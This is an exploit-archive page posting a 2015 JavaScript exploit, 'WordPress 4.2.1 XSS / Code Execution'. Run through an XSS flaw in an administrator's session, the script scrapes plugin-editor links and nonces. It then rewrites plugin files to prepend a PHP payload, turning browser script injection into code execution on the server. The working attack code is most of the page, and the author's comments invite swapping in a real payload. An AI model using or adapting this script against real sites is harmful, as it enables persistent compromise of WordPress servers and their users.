WordPress 4.2.1 XSS / Code Execution

WordPress 4.2.1 XSS / Code Execution: Posted May 5, 2015; Authored by Evex; Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator.; tags | exploit, xss; SHA-256 | 33c5a93d9c166c66afcb482c710e464de322c5ec0a613732f0359dd148d1bd94; Download | Favorite | View

WordPress 4.2.1 XSS / Code Execution

/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress
Plugins/Themes/Core To End Up Executing Code After The Being Triggered With
Administrator Previliged User. ¯\_(ツ)_/¯
Reference: http://research.evex.pw/?vuln=14
Enjoy.

*/
//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ?
'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout: 30000,
  success: function (txt) {
    xss_div.html(txt);
  }
});
//Put All Plugins Edit URL in Array
plugins_edit = [
];
xss_div.find('a').each(function () {
  if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
    plugins_edit.push(jQuery(this).attr('href'));
  }
});
//Inject Payload
for (var i = 0; i < plugins_edit.length; i++) {
  jQuery.ajax({
    url: plugins_edit[i],
    type: 'GET',
    async: false,
    cache: false,
    timeout: 30000,
    success: function (txt) {
      xss_div.html(txt);
      _wpnonce =
jQuery('form#template').context.body.innerHTML.match('name="_wpnonce"
value="(.*?)"') [1];
      old_code = jQuery('form#template div textarea#newcontent') [0].value;
      payload = '<?php phpinfo(); ?>';
      new_code = payload + '\n' + old_code;
      file = plugins_edit[i].split('file=') [1];
      jQuery.ajax({
        url: plugins_edit[i],
        type: 'POST',
        data: {
          '_wpnonce': _wpnonce,
          'newcontent': new_code,
          'action': 'update',
          'file': file,
          'submit': 'Update File'
        },
        async: false,
        cache: false,
        timeout: 30000,
        success: function (txt) {
          xss_div.html(txt);
          if (jQuery('form#template div textarea#newcontent')
[0].value.indexOf(payload) != - 1) {
            // Passed, this is up to you ( skiddies Filter :D )
            injected_file = window.location.href.split('wp-admin') [0] +
'/wp-content/plugins/' + file; //
http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
            throw new Error('');
          }
        }
      });
    }
  });
}

Top Authors In Last 30 Days

Red Hat 194 files
Ubuntu 67 files
Debian 24 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,011)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,194)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,473)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,437)
UNIX (9,390)
UnixWare (187)
Windows (6,649)
Other

WordPress 4.2.1 XSS / Code Execution

WordPress 4.2.1 XSS / Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress 4.2.1 XSS / Code Execution

Share This

WordPress 4.2.1 XSS / Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems